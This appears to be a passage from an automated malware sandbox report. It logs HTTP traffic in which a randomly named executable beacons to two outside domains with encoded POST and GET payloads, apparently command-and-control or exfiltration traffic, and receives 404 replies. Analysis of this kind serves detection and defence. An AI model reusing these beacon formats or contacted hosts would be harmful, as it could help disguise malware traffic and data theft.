                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 2f 56 46 68 41 36 73 36 6e 56 79 54 54 32 54 62 75 58 32 41 2f 36 6f 70 7a 58 58 76 42 46 72 42 73 35 5a 46 68 32 47 78 33 6a 4d 37 68 49 53 2b 4e 35 4b 44 41 41 42 74 71 39 46 6d 4d 6c 30 4a 2f 51 36 65 62 2f 57 36 52 6c 76 59 42 4d 36 38 51 69 77 36 4d 4c 37 4e 44 38 36 41 4c 69 62 61 6c 49 48 6d 32 46 34 37 6c 44 46 78 4c 2b 50 6d 76 4d 30 71 71 35 72 54 71 38 43 6a 6e 52 45 52 70 6e 38 47 72 50 64 59 70 58 68 42 65 6a 70 71 65 6b 4c 50 61 6f 76 62 58 2b 6e 4c 34 6d 75 50 66 67 58 7a 69 74 2b 6a 4e 74 6a 54 79 39 6c 53 39 72 77 69 56 6e 6a 67 56 4f 6c 47 72 78 35 51 31 2b 42 64 32 53 65 66 34 62 2f 6e 62 7a 67 67 6e 47 45 70 73 73 3d
                                                          Data Ascii: TvpPfhGp=V/VFhA6s6nVyTT2TbuX2A/6opzXXvBFrBs5ZFh2Gx3jM7hIS+N5KDAABtq9FmMl0J/Q6eb/W6RlvYBM68Qiw6ML7ND86ALibalIHm2F47lDFxL+PmvM0qq5rTq8CjnRERpn8GrPdYpXhBejpqekLPaovbX+nL4muPfgXzit+jNtjTy9lS9rwiVnjgVOlGrx5Q1+Bd2Sef4b/nbzggnGEpss=
                                                          Jul 3, 2024 15:58:48.459342003 CEST336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.44976846.30.211.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:50.365294933 CEST10822OUTPOST /2gp2/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          Origin: http://www.n-ambu.com
                                                          Referer: http://www.n-ambu.com/2gp2/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 56 2f 56 46 68 41 36 73 36 6e 56 79 54 54 32 54 62 75 58 32 41 2f 36 6f 70 7a 58 58 76 42 46 72 42 73 35 5a 46 68 32 47 78 33 62 4d 37 54 77 53 2b 73 35 4b 43 41 41 42 6e 4b 39 47 6d 4d 6c 70 4a 37 38 32 65 62 69 72 36 53 4e 76 5a 6e 51 36 35 69 47 77 74 63 4c 37 43 6a 38 2f 66 62 69 43 61 6b 6b 62 6d 33 31 34 37 6c 44 46 78 4b 4f 50 31 65 4d 30 6c 4b 35 73 44 4b 38 4f 6e 6e 52 73 52 71 58 43 47 72 61 6f 59 61 66 68 43 2f 54 70 72 73 38 4c 48 61 6f 74 61 58 2f 67 4c 34 36 68 50 65 4e 75 7a 68 78 48 6a 4b 6c 6a 54 33 55 63 4a 50 44 6e 32 6d 76 72 78 6e 32 31 4c 37 30 34 51 6e 75 6c 58 44 32 35 63 35 33 32 6c 61 43 45 78 69 4f 48 36 4c 57 70 6b 56 75 53 32 43 76 52 75 51 65 61 78 35 52 78 48 48 74 61 34 78 79 45 33 78 4a 4c 67 48 4d 67 78 65 52 41 72 70 30 36 6a 51 76 7a 45 32 78 6d 69 42 78 4d 31 44 5a 46 75 52 78 53 59 79 56 6f 79 66 55 75 59 70 47 70 6a 33 56 2b 2b 6d 39 32 58 48 34 55 51 38 62 34 43 53 4d 37 66 4c 52 7a 69 56 30 73 33 2b 4c 4d 42 50 48 5a 7a 2b 64 78 7a [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=V/VFhA6s6nVyTT2TbuX2A/6opzXXvBFrBs5ZFh2Gx3bM7TwS+s5KCAABnK9GmMlpJ782ebir6SNvZnQ65iGwtcL7Cj8/fbiCakkbm3147lDFxKOP1eM0lK5sDK8OnnRsRqXCGraoYafhC/Tprs8LHaotaX/gL46hPeNuzhxHjKljT3UcJPDn2mvrxn21L704QnulXD25c532laCExiOH6LWpkVuS2CvRuQeax5RxHHta4xyE3xJLgHMgxeRArp06jQvzE2xmiBxM1DZFuRxSYyVoyfUuYpGpj3V++m92XH4UQ8b4CSM7fLRziV0s3+LMBPHZz+dxzUwEOD1Ll3DAin1bxguLEPrNXaN8rP7krUqHDYRb6r2L8pwf/WMO2AaOeLAu7GcABIENDZYFi9haGg7dNKjPbkDehCL2306/kvNRlURd5zVW7q+8Nev88ytWNejZ4fDS96Gtz4/pBLRAwtS9glNRTZCUl21IfZgaPD5NvqgVF8v5SS+hJGAEwZgBpCPlZxa1xKdXAKpUoLXhjgZQahB0AoiJkW1JOxJ54HU5A2vWQU69/OfS4V5BUW55zcWEPoXr2+w9hU3U1inQ+Yj68Mgn6jN2JrZtHxMa23aL01J5+fksNJ8nR3EW0oOf0JVM+A6H+ATv4fWnvD4lhLDatSFDp4McwJ1fY/qTD2QoEvLSArwpQRxUKvbfwWcW6VsjnHx277Zw0irehL57ZeqSpQCXRTl7f8/LtGW+OYg78AY56dUiZgYpKW13ujrfIWw0bGxJkPGyKtAVQ9H6b2XUgydu6RiFbLUwb2P8yWyw4ux9oqP/roVJYnwPAikaNgqoHk9mWG7Sg9I9YoB/PTAn8IFm7EmxvT03k4yGfqDjO37A89dDNvkFhpD3myay61lvPqWMXvs6btTfW502+Z8BEXpT64lmXLZjcTH4E43ZlBcrANb/+MJhDm7pqJW2LTmuo98htAbl5fxw0Af3mhNl1QcjcqX/6FWoNyOHmCB [TRUNCATED]
                                                          Jul 3, 2024 15:58:50.988629103 CEST336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:50 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          32192.168.2.44976946.30.211.38801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:52.894948006 CEST459OUTGET /2gp2/?TvpPfhGp=Y99li2SS0jFkeE2dW5fsIsqznCbyzAVNDcc+JEah7Ezrvxte8MpPDgExvKgilbZfLMJ3frvQmAcJOgkNzzn64tqjGSAfcd+mGzUUslxnkGXz4OyUxuBjmso=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.n-ambu.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:58:53.517133951 CEST336INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Wed, 03 Jul 2024 13:58:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 162
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          33192.168.2.449770217.160.0.119801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:58:58.567640066 CEST735OUTPOST /ndwb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 205
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          Origin: http://www.qrdinamicos.com
                                                          Referer: http://www.qrdinamicos.com/ndwb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 79 6f 61 79 36 62 51 76 52 65 38 59 50 51 43 56 6d 78 68 79 6b 61 44 52 67 6d 32 47 71 34 71 33 32 32 77 45 52 65 34 52 69 57 79 47 38 49 56 56 47 74 7a 70 65 61 49 33 6a 50 34 66 6c 32 43 76 56 4d 37 44 56 57 52 38 47 52 52 67 73 42 74 75 56 4b 2f 51 68 4a 32 62 6b 64 30 47 34 41 31 4b 47 56 42 36 49 57 51 57 57 31 33 6d 4a 69 37 59 79 61 2f 50 57 62 51 6e 6c 54 68 53 32 52 63 46 2b 32 4c 76 50 71 4a 63 51 72 70 58 77 55 70 54 69 72 51 76 42 71 6c 56 37 69 67 49 66 64 43 43 34 68 53 32 4e 49 4c 78 77 61 68 6a 78 6c 78 48 70 78 65 4b 6e 51 32 68 49 75 56 6c 58 6b 6f 74 2f 41 3d 3d
                                                          Data Ascii: TvpPfhGp=yoay6bQvRe8YPQCVmxhykaDRgm2Gq4q322wERe4RiWyG8IVVGtzpeaI3jP4fl2CvVM7DVWR8GRRgsBtuVK/QhJ2bkd0G4A1KGVB6IWQWW13mJi7Yya/PWbQnlThS2RcF+2LvPqJcQrpXwUpTirQvBqlV7igIfdCC4hS2NILxwahjxlxHpxeKnQ2hIuVlXkot/A==
                                                          Jul 3, 2024 15:58:59.248886108 CEST572INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:58:59 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                                          Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.449771217.160.0.119801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:01.099225998 CEST755OUTPOST /ndwb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 225
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          Origin: http://www.qrdinamicos.com
                                                          Referer: http://www.qrdinamicos.com/ndwb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 79 6f 61 79 36 62 51 76 52 65 38 59 4a 78 53 56 6b 57 56 79 73 61 44 65 73 47 32 47 67 59 71 7a 32 32 30 45 52 66 38 42 69 67 69 47 38 73 52 56 48 6f 48 70 62 61 49 33 6f 76 34 65 71 57 43 65 56 4d 2f 39 56 55 46 38 47 52 31 67 73 41 64 75 56 62 2f 66 37 35 32 5a 69 64 30 45 38 41 31 4b 47 56 42 36 49 57 46 7a 57 31 66 6d 49 53 4c 59 79 2b 54 4f 61 37 51 6d 67 6a 68 53 6e 42 64 4f 2b 32 4c 42 50 72 56 32 51 74 31 58 77 52 56 54 69 36 52 35 4b 71 6c 54 2f 69 67 62 52 73 66 74 38 44 44 67 4b 75 6a 79 35 2b 78 48 30 6a 67 64 34 41 2f 64 31 51 53 53 56 70 63 52 61 6e 56 6b 6b 4e 69 33 4d 2f 37 70 6f 30 36 52 6a 51 35 32 35 66 61 72 46 47 49 3d
                                                          Data Ascii: TvpPfhGp=yoay6bQvRe8YJxSVkWVysaDesG2GgYqz220ERf8BigiG8sRVHoHpbaI3ov4eqWCeVM/9VUF8GR1gsAduVb/f752Zid0E8A1KGVB6IWFzW1fmISLYy+TOa7QmgjhSnBdO+2LBPrV2Qt1XwRVTi6R5KqlT/igbRsft8DDgKujy5+xH0jgd4A/d1QSSVpcRanVkkNi3M/7po06RjQ525farFGI=
                                                          Jul 3, 2024 15:59:01.764475107 CEST572INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:59:01 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                                          Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.449772217.160.0.119801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:03.631957054 CEST10837OUTPOST /ndwb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 10305
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          Origin: http://www.qrdinamicos.com
                                                          Referer: http://www.qrdinamicos.com/ndwb/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Data Raw: 54 76 70 50 66 68 47 70 3d 79 6f 61 79 36 62 51 76 52 65 38 59 4a 78 53 56 6b 57 56 79 73 61 44 65 73 47 32 47 67 59 71 7a 32 32 30 45 52 66 38 42 69 67 71 47 38 66 4a 56 47 50 62 70 63 61 49 33 32 66 34 62 71 57 43 48 56 4d 48 68 56 55 49 48 47 58 78 67 71 6d 42 75 43 66 72 66 75 70 32 5a 76 39 30 42 34 41 30 65 47 56 52 2b 49 57 56 7a 57 31 66 6d 49 51 54 59 37 4b 2f 4f 63 37 51 6e 6c 54 68 4f 32 52 64 6d 2b 32 6a 33 50 6f 35 4d 51 65 74 58 7a 78 6c 54 76 6f 35 35 48 71 6c 52 34 69 68 47 52 73 54 79 38 44 50 61 4b 71 71 58 35 35 42 48 31 45 41 41 71 53 76 6b 6a 67 53 4e 50 75 67 4b 55 31 4e 57 71 65 58 4f 61 71 6d 39 34 6b 75 65 6f 7a 41 49 74 66 7a 70 63 52 67 33 45 4f 71 74 57 76 64 36 54 54 48 36 63 59 49 45 33 54 45 53 67 6a 48 57 51 70 67 6e 73 32 64 4e 63 4f 5a 5a 5a 6a 53 2b 65 54 32 48 54 6a 76 31 65 79 47 71 4b 64 7a 4d 4c 49 42 68 64 63 47 76 72 73 37 37 74 6b 46 72 66 48 34 65 6a 53 39 2b 33 70 66 67 45 71 69 74 7a 36 62 50 56 6d 4f 51 79 59 59 31 6c 6d 4e 77 32 71 47 71 33 75 6f 4f 77 [TRUNCATED]
                                                          Data Ascii: TvpPfhGp=yoay6bQvRe8YJxSVkWVysaDesG2GgYqz220ERf8BigqG8fJVGPbpcaI32f4bqWCHVMHhVUIHGXxgqmBuCfrfup2Zv90B4A0eGVR+IWVzW1fmIQTY7K/Oc7QnlThO2Rdm+2j3Po5MQetXzxlTvo55HqlR4ihGRsTy8DPaKqqX55BH1EAAqSvkjgSNPugKU1NWqeXOaqm94kueozAItfzpcRg3EOqtWvd6TTH6cYIE3TESgjHWQpgns2dNcOZZZjS+eT2HTjv1eyGqKdzMLIBhdcGvrs77tkFrfH4ejS9+3pfgEqitz6bPVmOQyYY1lmNw2qGq3uoOwSL4t8MG8fka1IlGe18cB0jKdKStnsaRVG9oa9GvdA2UdxvdtsFhWshANpvC7kP0G/HsdJYoZxVaZfirZwk422WhvrIs6PL1wYSpmRPk/VcOQ1Jc0SbEPb3PV7AObr05faHgqymccvS2jOos7/KsHeEQWADuAFCG8vZaRo+c8I9YIouR+14dUJOp0r6T5aLdaZxzUmylVU0A0rOzCRrOF7AmV6zhs3U1jS4DgGffk9rEe7QBmpEv6zMSlE03Tx11NxK+Z3X44VrY+JHgsg0urspSjkmgZbL81rZFAv9M5K7zNygdvyuwr4a3nG5pxMRVu8PNM0vUYVHGcfb8RTLtBnt8fUs9ekpR9BqPu2b6KLhCfN9/nqBAaiYBaYaSetKYrJcm4oZG4ZNjg9SsCcqjiDRCmrevyKARgRjJCyvTuoLujNVM3iZl5jpoqDA0ZTRUEfE5GEQuhxHJBMxDZUG+TCLK/BA5K0SFzNDEHdz1/o5WH1PAvDc3+KFGcGb/z7+Md4W/P2Z4ysESJjZJ1iH8U8zdsIy1hprxcZIIPVlg4tVkAXzr757RSXn3GluQUUZwnyyEQdsiB9kL4eVeOz93cqCglMu/LmzB5P2W3OvKyYXoBbekvkj90JDIvpr6DHElPqlXxRs1P5Px2zZOuVRbt7AKwShttTX+8GB [TRUNCATED]
                                                          Jul 3, 2024 15:59:04.285289049 CEST572INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:59:04 GMT
                                                          Server: Apache
                                                          Content-Encoding: gzip
                                                          Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                                          Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.449773217.160.0.119801908C:\Program Files (x86)\ptvgYRELOxXEnkVTYfeWiOcLZYZnRRRQwCwybEFTKeWJvTAPtIEqzYqrGpJfBZEigygpiAIp\UJCHZIamnVz.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 3, 2024 15:59:06.163959026 CEST464OUTGET /ndwb/?TvpPfhGp=/qyS5uFMStFKGiC7gxlopLbluV61vu+RjDYXbeo3nHi2h/5APNXwWrEdkOsmqUKqQbrnCVB7EyQd8x04JYqB6drGuaM8rj1nd0RRI3hUZH7sElvU+ZecVtI=&Y664G=SttDen986 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.qrdinamicos.com
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Mercury/8.7 Mobile/11B554a Safari/9537.53
                                                          Jul 3, 2024 15:59:06.803212881 CEST740INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Content-Length: 596
                                                          Connection: close
                                                          Date: Wed, 03 Jul 2024 13:59:06 GMT
                                                          Server: Apache
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 